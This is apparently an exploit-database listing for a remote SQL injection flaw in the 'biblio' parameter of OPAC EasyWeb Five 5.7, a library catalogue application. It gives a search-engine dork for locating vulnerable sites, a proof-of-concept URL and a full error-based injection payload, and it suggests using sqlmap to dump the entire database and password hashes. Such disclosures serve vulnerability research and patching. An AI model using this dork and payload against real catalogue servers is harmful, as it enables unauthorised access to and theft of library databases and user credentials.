OPAC EasyWeb Five version 5.7 suffers from a remote SQL injection vulnerability in the biblio input.
06a064fa6626f63fa9d75e10581ee339fde2278790ee80a59e18cade8135cceb# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
# Dork: inurl:"index.php?scelta=campi"
# Date: 2018-10-02
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://www.nexusfi.it/
# Software Link: http://www.nexusfi.it/easyweb.php
# Version: 5.7
# Category: Webapps
# Platform: PHP
# CVE: N/A
# POC:
# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=
# You can use sqlmap for dump entire database and dumping hash
scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
COUNT(*),CONCAT(0x7176627a71,(SELECT
(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
'CrYc'='CrYc&lang=
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed